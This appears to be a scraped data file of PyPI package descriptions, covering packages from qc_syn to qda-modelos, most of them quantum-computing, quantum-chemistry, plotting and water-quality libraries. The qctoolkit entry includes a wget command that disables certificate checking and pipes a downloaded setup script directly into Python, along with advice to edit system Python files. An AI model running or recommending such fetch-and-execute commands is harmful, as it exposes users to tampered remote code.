thegym.makefunction:importgymnasiumasgymimportqc_synenv=gym.make(\"qc_syn/QuantumCircuit-v0\",qubit_count=4)observation,info=env.reset()for_inrange(1000):action=env.action_space.sample()# agent policy that uses the observation and infoobservation,reward,terminated,truncated,info=env.step(action)ifterminatedortruncated:observation,info=env.reset()env.close()ContributingContributions are welcome! Please feel free to submit a pull request.LicenseThis project is licensed under the terms of the MIT license."} +{"package": "qcsys", "pacakge-description": "qcsysComing very soon!"} +{"package": "qct", "pacakge-description": "Qct Qt4/PyQt based commit toolPrimary goals:Cross-Platform (Linux, Windows-Native, MacOS)Be VCS agnosticGood keyboard navigation, keep the typical work-flow simpleUniversal change selectionCurrently supports Mercurial, Bazaar, CVS, and Monotone repositories."} +{"package": "qct-cuda-ops", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qctic", "pacakge-description": "QCTIC Qiskit ProviderA Qiskit provider based onQiskit Aerthat may be used to interact with the quantum simulation platformQCTIClocated atCTIC.Please check the/notebooksfolder for some introductory examples of usage."} +{"package": "qctma", "pacakge-description": "Injects material (Young\u2019s modulus) to each element, based on a Dicom stack, and gray level to Young\u2019smodulus relationships. Specifically designed to be used with Ansys .cdb meshes."} +{"package": "qctoolkit", "pacakge-description": "Python modules for quantum chemistry applications=====================================================qctoolkit is quantum chemistry tool kit.It meant to provide universal interface to ab initio codeto test ideas or to produce data reliably.The code includes Abinit, QuantumESPRESSO, Gaussian, NwChem,CPMD, BigDFT, ... etc.It also provide some basic molecule operations, includingrotation, stretching, alignment, bond identification, ... etc,and data formatting, includingxyz files, Gaussian CUBE files, V\\_SIM ascii files, pdb files, ... etc.It seems worthwile to put effort to rewrite my bash/perl/python/Ctools in to an integrated module or package. It should boosts thereusability, productivity, and reproducibility of my resultsgenerated during my PhD in Basel.More importantly, every results should be easily reproduced,examined, and especially furthre developed. This package starts ascollections of modules of format I/O, analysis, plots.Hopefully, these modules can one day become a package for generalpurpose chemistry tool kit.**Installation on Ubuntu 32/64 systems**:* __To install__: ```cd /path/to/qctoolkit && python setup.py install --user``` or install by pip using ```pip install qctoolkit --user```.* __Install on Amazon Ec2__: It is tested and working on amazon Ec2 ubuntu instances. For a fresh install, all dependencies must be installed```sudo apt-get update && sudo apt-get install -y gcc g++ gfortran liblapack-dev liblapack-doc-man liblapack-doc liblapack-pic liblapack3 liblapack-test liblapacke liblapacke-dev libgsl0-dev libatlas-base-dev build-essential libffi6 libffi-dev libssl-dev libyaml-dev libpython2.7-dev python-pip python-dev freetype* python-matplotlib cython```Note that matplotlib and cython are installed through ubuntu repository for convenience. It might be necessary to create temperary swap if the memory run out:```sudo /bin/dd if=/dev/zero of=/var/swap.1 bs=1M count=1024sudo /sbin/mkswap /var/swap.1sudo /sbin/swapon /var/swap.1```Then do pip install ```pip install qctoolkit --user```If temerary swap is added, remove after installation:```sudo swapoff /var/swap.1sudo rm /var/swap.1```* __To remove__: Manually remove all created files. List of files canbe obtained by the --record flag during install```python setup.py install --user --record fileList.txt```* **Note** that the ```setup.py``` script depends on python setuptoolspackage. This can be installed by```wget https://bootstrap.pypa.io/ez_setup.py --no-check-certificate -O - | python - --user```with superuser priviledge* The package depends on [NumPy > 1.11.0](http://www.numpy.org/),[SciPy > 0.16.0](https://www.scipy.org/),[pandas > 0.17.1](http://pandas.pydata.org/),and [matplotlib > 1.5.1](http://matplotlib.org/).* **Note** that newer version for many python modules are required. They must __NOT__be installed via ubuntu repository. When a module is installedthrough ubuntu repository as python-modeul (e.g. python-numpy),import path of such module **WILL GET** highest priority.In other words, stable but out-dated versions will always get loaded.To circumvent this,the best solution is to use virtual enviroment and setup dependancy.However, it is also possible to modify the system behaviourby edditing the easy_install path ```/usr/local/lib/python2.7/dist-packages/easy-install.pth```Simply comment out the second line ```/usr/lib/python2.7/dist-packages```supresses the system to insert this path before PYTHONPATH.However, for some systems this fix is still not working.In that case, one has to modify the python default behaviour of constructing ```sys.path```variable. It can be done via modifying ```/usr/lib/python2.7/site.py```and add the following two lines to the end of the file:```sys.path.remove('/usr/lib/python2.7/dist-packages')sys.path.append('/usr/lib/python2.7/dist-packages')```* **Note** that all code are writen with **2-space indentation**.To change it according to pep8 standard, use the following command:```cd /path/to/qctoolkit && find . -name \"*.py\"|xargs -n 1 autopep8 --in-place```where ```autopep8``` can be installed simply via ```pip install autopep8 --user```**Dependent Python packages**:* numpy 1.11.0* scipy 0.16.0* pandas 0.17.1* matplotlib 1.5.1* matplotlib.pyplot* PyYAML 3.11* cython* psutil* networkx* periodictable* mdtraj* paramiko (newest version might be problematic, 1.17 works fine)* And standard libraries: sys, re, os, glob, math, subprocess, multiprocessing, copy, collections, compiler.ast, shutil, fileinput, operator, inspect, xml.etree.ElementTree* pymol is also used for visualization* pyscf and horton is optional**Implemented interfaces to QM codes**:* Gaussian basis:- [Gaussian](www.gaussian.com/)- [NWChem](www.nwchem-sw.org/index.php/Main_Page)- [horton](theochem.github.io/horton/)- [pyscf](http://sunqm.github.io/pyscf/)* Plane wave basis:- [VASP](www.vasp.at)- [QuantumESPRESSO](www.quantum-espresso.org/)- [CPMD](www.cpmd.org/)- [Abinit](http://www.abinit.org/)* Wavelet basis:- [BigDFT](bigdft.org/Wiki/index.php?title=BigDFT_website)**Required libraries**:* OpenMP* openmpi* gsl(GNU Scientific Library)* LAPACK* libxc-3.0.0*20150702 KYSC*"} +{"package": "qctools", "pacakge-description": "qctoolsPython tools for quantum chemistsFeaturesDefine Event Handlers for straightforward parsing of Quantum Chemistry OutputExample:Read natoms from Gaussian Output file:1. Step: Define the EventThe number of atoms are written typically in the following way\nin the Gaussian output file:.Gaussian Log File...\nNAtoms= 3 NActive= 3 NUniq= 2 SFac= 2.25D+00 NAtFMM= 50 NAOKFM=F Big=F\nOne-electron integrals computed using PRISM.\n...the event should do the following:It should loop over all lines of the file, till it findes the\nKeywordNAtoms=It should return that line and extract the 2. element of that\nline as a stringThe corresponding event looks like:>>> NAtoms = Event('NAtoms',\n... 'grep', {'keyword': 'NAtoms=',\n... 'ilen': 1,\n... 'ishift': 0},\n... func='split',\n... func_kwargs={'idx': 1, 'typ': int}\n...)The first entry is the name of the event, and can be any name.\nThe second entry is the type of the event, in this case just grep.\nThe third entry gives the parameter to the corresponding event function:\n[we want to search for \u2018NAtoms=\u2019 and return a single line (ilen=1)\nnot shifted (ishift=0) from the keyword.]Afterwards the line is given to a postprocessing function (\u2018split\u2019) which\nsplits the line by spaces and returns the element[1] of the line as an integer.\nRemember, this is Python/C notation to element[1] is the second element in the list.For the Forces the event should look the following:-------------------------------------------------------------------\nCenter Atomic Forces (Hartrees/Bohr)\nNumber Number X Y Z\n-------------------------------------------------------------------\n 1 8 0.000000000 0.000000000 0.005485119\n 2 1 0.000000000 0.017353174 -0.002742559\n 3 1 0.000000000 -0.017353174 -0.002742559\n------------------------------------------------------------------>>> forces = Event('forces',\n... 'xgrep', {'keyword': 'Forces (Hartrees/Bohr)',\n... 'ilen': 'NAtoms',\n... 'ishift': 3},\n... func='split',\n... func_kwargs={'idx': [2, 3, 4], 'typ': [float, float, float]},\n... settings={'multi': False},\n...)2. Step: Add the new event to an existing Event Handler>>> GaussianReader.add_event(\"NAtoms\", NAtoms)\n>>> GaussianReader.add_event(\"forces\", forces)3. Step: Use the Event Handler to parse an file>>> gauout = GaussianReader(\"h2o.log\", [\"NAtoms\", \"forces\"])\n>>> gauout[\"NAtoms\"]\n3\n>>> gauout[\"forces\"]\n[[0.0,0.0,0.005485119],[0.0,0.017353174,-0.002742559],[0.0,-0.017353174,-0.002742559]]CreditsDevelopment LeadMaximilian MengerContributorsWhy not be the first?Thanks to:Boris MaryasinGustavo CardenasCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2019-04-12)First release on PyPI."} +{"package": "qctrl", "pacakge-description": "\u26a0\ufe0f (DEPRECATED) This package has been deprecated \u26a0\ufe0fWe've created a new dedicated and improved Boulder Opal client,boulderopal. Support for the legacyqctrlclient ended on 2024-01-31. You can read theBoulder Opal get started guideorcontact usif you need assistance.Q-CTRLThe Q-CTRL Python package provides an intuitive and convenient Python interface\nto Q-CTRL's quantum control solutions for users of Boulder Opal. Boulder Opal\nis a versatile Python toolset that provides everything a research team needs to\nautomate and improve the performance of hardware for quantum computing and\nquantum sensing."} +{"package": "q-ctrl", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qctrl-admin-cli", "pacakge-description": "Q-CTRL Admin CLIThis is a utility which is intended for internal use."} +{"package": "qctrl-cirq", "pacakge-description": "Q-CTRL Python CirqThe aim of the Q-CTRL Cirq Adapter package is to provide export functions allowing\nusers to deploy established error-robust quantum control protocols from the\nopen literature and defined in Q-CTRL Open Controls on Google quantum devices\nand simulators.Anyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-client", "pacakge-description": "Q-CTRL Python ClientThe Q-CTRL Python Client package provides a Python client to access Q-CTRL's GraphQL API. It is used as a base for Q-CTRL's client-side product packages and for inter-service communication."} +{"package": "qctrl-commons", "pacakge-description": "Q-CTRL CommonsQ-CTRL Commons is a collection of common libraries for the Python language."} +{"package": "qctrl-core-workflow-manager", "pacakge-description": "Q-CTRL Core Workflow ManagerThis is a utility which is intended for internal use."} +{"package": "qctrl-experiment-scheduler", "pacakge-description": "Q-CTRL Experiment SchedulerThe Q-CTRL Experiment Scheduler package for Boulder Opal allows you to automate the workflow of complex calibration procedures. The scheduler will take into account the dependency between different parts of the calibration, the status of each of these parts, and the parameters that you are most interested in the calibration. With this information, it will determine the sequence that the calibrations have to be executed and run them for you.The Q-CTRL Experiment Scheduler was developed to be used with the quantum control software toolset Boulder Opal. See how you canget started with Boulder Opaltoday."} +{"package": "qctrl-local-bundler", "pacakge-description": "Q-CTRL Local BundlerThis is a utility which is intended for internal use."} +{"package": "qctrl-logging-utils", "pacakge-description": "Q-CTRL Logging UtilsThis is a utility which is intended for internal use."} +{"package": "qctrl-mloop", "pacakge-description": "Q-CTRL M-LOOP AdapterThe Q-CTRL M-LOOP Adapter package allows you to integrate Boulder Opal automated closed-loop optimizers with automated closed-loop optimizations managed by the open-source package M-LOOP.See how you can use M-LOOP with Boulder Opal in the user guideHow to manage automated closed-loop hardware optimization with M-LOOP."} +{"package": "qctrl-nuitka", "pacakge-description": "Q-CTRL NuitkaThis is a utility which is intended for internal use."} +{"package": "qctrl-open-controls", "pacakge-description": "Q-CTRL Open ControlsQ-CTRL Open Controls is an open-source Python package that makes it easy to create and deploy established error-robust quantum control protocols from the open literature. The aim of the package is to be the most comprehensive library of published and tested quantum control techniques developed by the community, with easy to use export functions allowing users to deploy these controls on:Custom quantum hardwarePublicly available cloud quantum computersTheQ-CTRL product suiteAnyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-pyquil", "pacakge-description": "\u26a0\ufe0f (DEPRECATED) This package has been deprecated \u26a0\ufe0fVisithttps://docs.q-ctrl.comfor updated information about how to integrate Q-CTRL software with PyQuil."} +{"package": "qctrl-qiskit", "pacakge-description": "Q-CTRL Qiskit adapterThe aim of the Q-CTRL Qiskit Adapter package is to provide export functions allowing\nusers to deploy established error-robust quantum control protocols from the\nopen literature and defined in Q-CTRL Open Controls on IBM Quantum hardware.Anyone interested in quantum control is welcome to contribute to this project."} +{"package": "qctrl-qua", "pacakge-description": "Q-CTRL QUA AdapterThe Q-CTRL QUA Adapter package allows you to integrate Boulder Opal with the QUA quantum computing language.See how you can do that in the user guideHow to integrate Boulder Opal with QUA from Quantum Machines."} +{"package": "qctrl-release-noter", "pacakge-description": "Q-CTRL Release NoterThe Q-CTRL Release Noter Python package provides a command line tool that generates the recommended release notes for a GitHub package from Q-CTRL.InstallationInstall the Q-CTRL Release Noter with:pipinstallqctrl-release-noterUsageIn the repository whose release notes you want to generate, run:release_noterYou can also specify the path of the repository:release_noter/path/to/repositoryTo prefill the information on the GitHub release page, use:release_noter--github"} +{"package": "qctrl-service-utils", "pacakge-description": "Q-CTRL Service UtilsThis is a utility which is intended for internal use."} +{"package": "qctrl-sphinx-theme", "pacakge-description": "Q-CTRL Sphinx ThemeThe Q-CTRL Sphinx Theme is a very opinionatedSphinxtheme intended for use with publicQ-CTRL Documentationwebsites such as theQ-CTRL Python package.InstallationInstall the Q-CTRL Sphinx Theme package.pipinstallqctrl-sphinx-themeAddqctrl-sphinx-themeas a dev dependency in yourpyproject.tomlfile.Add the following to your project\u2019sconf.pyfile:html_theme=\"qctrl_sphinx_theme\"ConfigurationThe Q-CTRL Sphinx Theme requires no configuration and there is no need to set anyhtml_theme_optionsin your project\u2019sconf.pyfile. The theme will automatically set all necessary theme options and will update any theme option with an available environment variable if one exists."} +{"package": "qctrl-toolkit", "pacakge-description": "Q-CTRL ToolkitToolkit of convenience functions and classes for the Q-CTRL Python package."} +{"package": "qctrl-visualizer", "pacakge-description": "Q-CTRL VisualizerThe Q-CTRL Visualizer offers broad functionality to visually engage with quantum dynamics and quantum controls. These tools can help you develop understanding and intuition, and ultimately support the implementation of your quantum controls. See the topicVisualizing your data using the Q-CTRL Visualizerin the Q-CTRL documentation for more information.The Q-CTRL Visualizer is meant to be used with the Q-CTRL products Boulder Opal, Fire Opal, and Open Controls. See how you can get started withBoulder OpalandFire Opaltoday."} +{"package": "qctrl-workflow-client", "pacakge-description": "Q-CTRL Python Workflow ClientThe Q-CTRL Python Workflow Client package provides a Python client to access Q-CTRL's GraphQL API and the Workflow framework. It is used as a base for Q-CTRL's client-side product packages."} +{"package": "qcustomplot", "pacakge-description": "No description available on PyPI."} +{"package": "qcustomplot-pyside2", "pacakge-description": "Pyside2 bindings for QCustomplotThis project provides Python (v3.6 - v3.10) bindings for the popular OpenSourceQCustomPlot(v2.1.0) Qt (v5.15.2) plotting library.\nThe bindings are provided for Linux and Windows (64bit).The project can be found onGithub.InstallationYou can install the library and run the examples with the following commands.\nPreferably you should do this in a pythonvirtual environment.pip install qcustomplot_pyside2 # Install latest version of the library\nqcustomplot_examples # Start demos with default delay\nqcustomplot_examples 0 # Start demos without automatic continuation\nqcustomplot_examples 5000 # Continue demos every 5000 msExamplesThe folderqcustomplot_examples_pyside2contains the examples from the QCustomplot C++ webpage translated to Python.\nThese can be used as basis for own development or for seeing the features of the library.Running all examplesThe example commandqcustomplot_exampleslinking to the scriptall_demos.pyruns through all examples\nwith a default or user specified delay time.Install the matching python wheel from the wheels directory (preferably in a virtual environment).Start the shell script 'qcustomplot_examples' which will run all examplesSimple example codeimport shiboken2 as Shiboken\nfrom PySide2 import QtGui\nimport sys\nimport math\nfrom random import uniform,randint\nfrom PySide2.QtWidgets import QApplication, QDialog, QLineEdit, QPushButton, QVBoxLayout,QWidget,QMainWindow\nfrom PySide2.QtGui import QLinearGradient, QRadialGradient, QColor, QBrush, QPen, QFont, QPixmap, QPainterPath\nfrom PySide2.QtCore import Qt, QMargins,QPointF,QObject,QCoreApplication,QFile,QTimer,QLocale,QDateTime,QDate,QSize,QTime\nfrom PySide2.QtUiTools import QUiLoader\nfrom qcustomplot_pyside2 import *\n\ndef demo(app):\n # Create plot\n customPlot = QCustomPlot()\n customPlot.resize(800, 600)\n customPlot.setWindowTitle('Quadratic Demo')\n\n # generate some data:\n x = [0.0] * 101 # initialize with entries 0..100\n y = [0.0] * 101 \n for i in range(0, 101):\n x[i] = i/50.0 - 1 # x goes from -1 to 1\n y[i] = x[i]*x[i] # let's plot a quadratic function\n\n # create graph and assign data to it:\n customPlot.addGraph()\n customPlot.graph(0).setData(x, y)\n # give the axes some labels:\n customPlot.xAxis.setLabel(\"x\")\n customPlot.yAxis.setLabel(\"y\")\n # set axes ranges, so we see all data:\n customPlot.xAxis.setRange(-1, 1)\n customPlot.yAxis.setRange(0, 1)\n\n # show the plot\n customPlot.show()\n # run the main Qt loop\n res = app.exec_()\n # Make sure and manually reset pointer\n customPlot = None\n return res\n\n\nif __name__ == '__main__':\n # Create the Qt Application\n app = QApplication(sys.argv)\n res = demo(app)\n sys.exit(res)ScreenshotsSee the [Wiki] (https://github.com/SBGit-2019/Pyside-QCP/wiki) for some screenshots and explanations.\nAll screenshots can also be found in thefigures directory.VersionsThe version naming of the Python bindings is analogue to the naming of the QCustomPlot library.v2.0.1: QCustomPlot library 2.0.1: All basic featuresv2.1.0: QCustomPlot library 2.1.0: Experimental radial plots and more bindings.v2.1.1: Small bugfixesv2.1.2: Small bugfixes for Scatterplot with single pointsv2.1.4: Bugfix for zero line and issue #4v2.1.5: Allow python access to all public fields of QCP (issue #5)\n(Note: Access to QCPpublic fieldshas changed from methods, e.g. w.start() to fields, e.g. w.start, methods are available still as w.get_start())LicenseThis project is licensed under the GPLv3+ License - see theLICENSEfile for details.Additionally, you can also use these bindings / these python wheels in commercial projects:if you have a commercial license for QCustomPlot 2.xfullfill the Qt license requirements, which typically mean you are using only the LGPL features of Qt 5.x or have a commercial license of Qt 5.x (as the bindings link only dynamically to Qt)Note that commercial licenses are available for [QCustomPlot] athttps://www.qcustomplot.com/.AcknowledgmentsEmanuel Eichhammer author ofQCustomPlot[Qt] (https://www.qt.io/)"} +{"package": "qc-utils", "pacakge-description": "qc-utilsis a python package that providesQCMetricandQCMetricRecordclasses that can be used for representing ENCODE pipeline quality control metrics.Installation$pipinstallqc-utilsProject Informationqc-utilsis released under theMITlicense, documentation lives inreadthedocs, code is hosted ongithuband the releases onPyPI."} +{"package": "qcware", "pacakge-description": "Forge Client LibraryThis package contains functions for easily interfacing with Forge.InstallationTo install with pip:pipinstallqcwareTo install from source, you must first installpoetry.\nThen, execute the following:gitclonehttps://github.com/qcware/platform_client_library_python.gitcdplatform_client_library_pythonpoetrybuildcddistpipinstallqcware-7.0.0-py3-none-any.whlAPI KeyTo use the client library, you will need an API key. You can sign up for one athttps://forge.qcware.com.To access your API key, log in toForgeand navigate to the API page. Your API key should be plainly visible there.A Tiny ProgramThe following code snippet illustrates how you might run Forge client code locally. Please make sure that you have installed the client library and obtained an API key before running the Python code presented below.# configurationfromqcware.forge.configimportset_api_key,set_hostset_api_key('YOUR-API-KEY-HERE')set_host('https://api.forge.qcware.com')# specify the problem (for more details, see the \"Getting Started\" Jupyter notebook on Forge)fromqcware.forgeimportoptimizationfromqcware.typesimportPolynomialObjective,Constraints,BinaryProblemqubo={(0,0):1,(0,1):1,(1,1):1,(1,2):1,(2,2):-1}qubo_objective=PolynomialObjective(polynomial=qubo,num_variables=3,domain='boolean')# run a CPU-powered brute force solutionresults=optimization.brute_force_minimize(objective=qubo_objective,backend='qcware/cpu')print(results)If the client code has been properly installed and configured, the above code should display a result similar to the following:Objectivevalue:-1Solution:[0,0,1]For further guidance on running client code to solve machine learning problems, optimization problems, and more, please read through the documentation made available athttps://qcware.readthedocs.ioas well as the Jupyter notebooks made available onForge."} +{"package": "qcware-quasar", "pacakge-description": "QuasarBuild status:What is Quasar?Quasar is an abstract library for creating and evaluating quantum computing\ncircuits. It also can be a way of transforming those circuits to be run\nnatively on a variety of QC architectures.This public version of Quasar is used to create circuits\nthat can be evaluated on QC Ware'sForgeplatform, but also can do\nsome evaluations locally with a classical simulation backend."} +{"package": "qcware-transpile", "pacakge-description": "No description available on PyPI."} +{"package": "qd", "pacakge-description": "No description available on PyPI."} +{"package": "qdafile", "pacakge-description": "Qdafile is a Python library to read and write KaleidaGraph(tm) version 3.x\nQDA data files.KaleidaGraph is a registered trademark ofAbelbeck Software.Qdafile is no longer being actively developed.Author:Christoph GohlkeLicense:BSD 3-ClauseVersion:2022.9.28RequirementsThis release has been tested with the following requirements and dependencies\n(other versions may work):CPython 3.8.10, 3.9.13, 3.10.7, 3.11.0rc2NumPy 1.22.4Revisions2022.9.28Return headers as str, not bytes (breaking).Add type hints.Drop support for Python 3.7 and numpy < 1.19 (NEP29).2021.6.6Support os.PathLike file names.Remove support for Python 3.6 (NEP 29).2020.1.1Remove support for Python 2.7 and 3.5.Examples>>> from qdafile import QDAfile\n>>> QDAfile().write('_empty.qda')\n>>> QDAfile(\n... [[1.0, 2.0, 0.], [3.0, 4.0, 5.0], [6.0, 7.0, 0.]],\n... rows=[2, 3, '2'],\n... headers=['X', 'Y', 'Z'],\n... dtypes=['>f8', '>i4', '>f4'],\n... ).write('_test.qda')\n>>> qda = QDAfile('_test.qda')\n>>> print(qda)\n\n file id: 12\n columns: 3\n rows: [2, 3, 2]\n headers: ['X', 'Y', 'Z']\n dtypes: ['>f8', '>i4', '>f4']\n>>> qda.headers[2]\n'Z'\n>>> qda[2, :qda.rows[2]]\narray([6., 7.])"} +{"package": "qda-modelos", "pacakge-description": "This repository has the implementation and tests of benchmarked\nbio-optic models that evaluates some water quality indexes by analyzing\nsatellite images.Table of contentsGeneral InfoGetting StartedUsageTestingContributingLinksAuthors and ContributorsLicenseGeneral InfoIn attempt to analyze the water quality of reservoirs and lakes by\nremote sensing methods, such as satellites images, bio-optical models\nwere used. Those models are mathematical and statistical algorithms\nwhich can be used to predict different water quality indexes by\nanalyzing the water-leaving radiance measured at different bands of\nelectromagnetic spectrum by sensors onboard satellites.According to the literature there are different approaches used in\nbio-optical modeling since simple models, based on empirical and\nsemi-empirical relations, until most complexes models based on radiative\ntransfer theory.Currently, this project implements a library of empirical and\nsemi-empirical models which can be used to predict the concentration of\nchlorophyll-a, total suspended solids, water transparency, turbidity,\nphycocyanin and the detection of macrophytes in aquatic environments.All the original equations are adapted in order to be applied in images\ncollected by MSI (Multispectral Instrument) sensor onboardSentinel-2A\nand Sentinel-2B\nplatforms.Getting StartedThese instructions will get you a copy of the project up and running on\nyour local machine for development and testing purposes.TechnologiesTo execute this project, you\u2019ll need the following technologies:32- or 64-bit computerPython 3SetupThis repository can be used as a complementary library for a main\nproject and its modules can be used whenever they are necessary.To install the package and dependencies use the following command:pip install qda_modelosIn order to useqda_modelosin your project it\u2019s required to install\ntherasteriolibrary:pip install rasterioYou can install dependencies directly in your machine or in a virtual\nenvironment of your choice, such asVirtualEnvorConda.UsageThe following example implements the water quality index: turbidity.The chosen method ismiller_mckee_2004which expects satellite\nimages of 659nm wavelength.This example utilizes Sentinel-2 imagery of which the band 4 has the\ncentral wavelength (665 nm) closest to the models requirement.First, import the required packages and desired methods:importrasterioasriofromqda_modelos.total_suspended_solids_turbidityimportmiller_mckee_2004In this case, we chose the rasterio package to read and write.tifdata files.Set and open the respective satellite images required to analyze the\nindexes:reflectance_659nm_wavelength=rio.open(\"tests/assets/20m/B4_20m_20181224.tif\").read()Open the band image file and choose one or more methods to analyze\nthe desired index:meta=rio.open(\"tests/assets/20m/B4_20m_20181224.tif\").metameta.update(driver=\"GTiff\")meta.update(dtype=rio.float32)miller_mckee_2004=miller_mckee_2004(reflectance_659nm_wavelength)Create and save the new image generated by the respectives bands of\nthe chosen method:withrio.open(\"miller_mckee_2004.tif\",\"w\",**meta)asdist:dist.write(miller_mckee_2004.astype(rio.float32))The output is a.tiffile containing the processed image by the\nchosen method:ReservoirTestingThis repository implementations can be tested by runningpytestcommand.python3-mpytestContributingContributions are always welcome! To fix a bug or enhance an existing\nmodule, follow these steps:Fork the repoCreate a new branch (git checkout-bimprove-feature)Make the appropriate changes in the filesAdd changes to reflect the changes madeCommit your changes (git commit-am'Improve feature')Push to the branch (git push originimprove-feature)Create a Pull RequestWhile contributing, remember to add tests to the new developed methods.LinksA Comprehensive Review on Water Quality Parameters Estimation Using\nRemote Sensing\nTechniquesBio-optical Modeling and Remote Sensing of Inland\nWatersReferencesChlorophyll-aALLAN, M.G, HICKS, B.J., BRABYN, L. (2007). Remote sensing of the\nRotorua lakes for water quality. CBER Contract Report No.\u00a051, client\nreport prepared for Environment Bay of Plenty. Hamilton, New Zealand:\nCentre for Biodiversity and Ecology Research, Department of Biological\nSciences, School of Science and Engineering, The University of Waikato.CHAVULA, G.; BREZONIK, P.; THENKABAIL, P.; JOHNSON, T.; BAUER, M.\nEstimating chlorophyll concentration in Lake Malawi from MODIS satellite\nimagery. Physics and Chemistry of the Earth, Parts A/B/C, [s. l.], v.\n34, n.\u00a013\u201316, p.\u00a0755\u2013760, 2009.DALL\u2019OLMO, G.; GITELSON, A. A.; RUNDQUIST, D. C. Towards a unified\napproach for remote estimation of chlorophyll-a in both terrestrial\nvegetation and turbid productive waters. Geophysical Research Letters,\n[s. l.], v. 30, n.\u00a018, 2003.GITELSON, A. A.; SCHALLES, J. F. & HLADIK, C. M. Remote chlorophyll-a\nretrieval in turbid, productive estuaries: Chesapeake Bay case study,\nRemote Sensing of Environment, v. 109, p.\u00a0464 \u2013 472, 2007.GORDON, H. & MOREL, A. Remote Assessment of Ocean Color for\nInterpretation of Satellite Visible Imagery: A Review. Lecture Notes on\nCoastal and Estuarine Studies, v. 4, Springer Verlag, New York, 114\np.\u00a01983.GONS, H. J. Optical Teledetection of Chlorophyllain Turbid Inland\nWaters. Environmental Science & Technology, [s. l.], v. 33, n.\u00a07,\np.\u00a01127\u20131132, 1999.GOWER, J.; KING, S.; BORSTAD, G.; BROWN, L. Detection of intense\nplankton blooms using the 709\u2009nm band of the MERIS imaging spectrometer.\nInternational Journal of Remote Sensing, [s. l.], v. 26, n.\u00a09,\np.\u00a02005\u20132012, 2005.LE, C.; LI, Y.; ZHA, Y.; SUN, D.; HUANG, C.; LU, H. A four-band\nsemi-analytical model for estimating chlorophyll a in highly turbid\nlakes: The case of Taihu Lake, China. Remote Sensing of Environment, [s.\nl.], v. 113, n.\u00a06, p.\u00a01175\u20131182, 2009.MISHRA, S.; MISHRA, D. R. A novel model for remote estimation of\nchlorophyll-a concentration in turbid productive waters. Remote Sensing\nof Environment, v. 117, p.\u00a0394 - 406, 2012.RODRIGUES, T; ALC\u00c2NTARA, E; WATANABE, F; ROTTA, LUIZ; IMAI, N;\nCURTARELLI, M & BARBOSA, C. Compara\u00e7\u00e3o entre M\u00e9todos Emp\u00edricos para\nestimativa da concentra\u00e7\u00e3o de Clorofila-a em Reservat\u00f3rios em Cascata\n(Rio Tiet\u00ea, S\u00e3o Paulo), Revista Brasileira de Cartografia, v. 68,\np.\u00a0181-192, 2016.CyanobacteriaDASH, P., WALKER, N.D., MISHRA, D.R., HU, C., PINCKNEY, J.L., D\u2019SA,\nE.J., (2011). Estimation of cyanobacterial pigments in a freshwater lake\nusing OCM satellite data. Remote Sens. Environ. 115 (12), 3409-3423.SIMIS, S.G.H., PETERS, S.W.M., GONS, H.J., (2005). Remote sensing of the\ncyanobacterial pigment phycocyanin in turbid inland water. Limnol.\nOceanogr. 50, 237-245.WOZNIAK, M., BRADTKE, K.M., DARECKI, M., KREZEL, A., (2016). Empirical\nmodel for phycocyanin concentration estimation as an indicator of\ncyanobacterial bloom in the optically complex coastal waters of the\nBaltic Sea. Remote Sens. 8 (3), 212-234.MacrophytesHUETE, A. A comparison of vegetation indices over a global set of TM\nimages for EOS-MODIS. Remote Sensing of Environment, [s. l.], v. 59,\nn.\u00a03, p.\u00a0440\u2013451, 1997.TUCKER, C. J. Red and photographic infrared linear combinations for\nmonitoring vegetation. Remote Sensing of Environment, [s. l.], v. 8,\nn.\u00a02, p.\u00a0127\u2013150, 1979.VILLA, P.; LAINI, A.; BRESCIANI, M.; BOLPAGNI, R. A remote sensing\napproach to monitor the conservation status of lacustrine Phragmites\naustralis beds. Wetlands Ecology and Management, [s. l.], v. 21, n.\u00a06,\np.\u00a0399\u2013416, 2013.VILLA, P.; MOUSIVAND, A.; BRESCIANI, M. Aquatic vegetation indices\nassessment through radiative transfer modeling and linear mixture\nsimulation. International Journal of Applied Earth Observation and\nGeoinformation, [s. l.], v. 30, p.\u00a0113\u2013127, 2014.Total Suspended Solids and TurbidityDOXARAN, D.; FROIDEFOND, J.-M.; CASTAING, P. Remote-sensing reflectance\nof turbid sediment-dominated waters Reduction of sediment type\nvariations and changing illumination conditions effects by use of\nreflectance ratios. Applied Optics, [s. l.], v. 42, n.\u00a015, p.\u00a02623,\n2003.DOXARAN, D.; FROIDEFOND, J.-M.; CASTAING, P.; BABIN, M. Dynamics of the\nturbidity maximum zone in a macrotidal estuary (the Gironde, France):\nObservations from field and MODIS satellite data. Estuarine, Coastal and\nShelf Science, [s. l.], v. 81, n.\u00a03, p.\u00a0321\u2013332, 2009.LIU, C. D., HE, B. Y., LI, M. T., REN, X. X. (2006). Quantitative\nmodeling of suspended sediment in middle Changjiang river from MODIS.\nChinese Geographical Science, v. 16, pp.\u00a079\u201382.MILLER, R. L.; MCKEE, B. A. Using MODIS Terra 250 m imagery to map\nconcentrations of total suspended matter in coastal waters. Remote\nSensing of Environment, [s. l.], v. 93, n.\u00a01\u20132, p.\u00a0259\u2013266, 2004.TANG, S.; LAROUCHE, P.; NIEMI, A.; MICHEL, C. Regional algorithms for\nremote-sensing estimates of total suspended matter in the Beaufort Sea.\nInternational Journal of Remote Sensing, [s. l.], v. 34, n.\u00a019,\np.\u00a06562\u20136576, 2013.TARRANT, P. E.; AMACHER, J. A.; NEUER, S. Assessing the potential of\nMedium-Resolution Imaging Spectrometer (MERIS) and Moderate-Resolution\nImaging Spectroradiometer (MODIS) data for monitoring total suspended\nmatter in small and intermediate sized lakes and reservoirs. Water\nResources Research, [s. l.], v. 46, n.\u00a09, 2010.ZHANG, Y.; LIN, S.; LIU, J.; QIAN, X.; GE, Y. Time-series MODIS\nImage-based Retrieval and Distribution Analysis of Total Suspended\nMatter Concentrations in Lake Taihu (China). International Journal of\nEnvironmental Research and Public Health, [s. l.], v. 7, n.\u00a09,\np.\u00a03545\u20133560, 2010.Water TransparencyGIARDINO, C. et al.\u00a0(2001). Detecting chlorophyll, Secchi disk depth and\nsurface temperature in a sub-alpine lake using Landsat imagery. The\nScience of Total Environment, v. 268, pp.\u00a019-29.GUIMAR\u00c3ES, V. S. et al.\u00a0(2016). Desenvolvimento de modelo emp\u00edrico 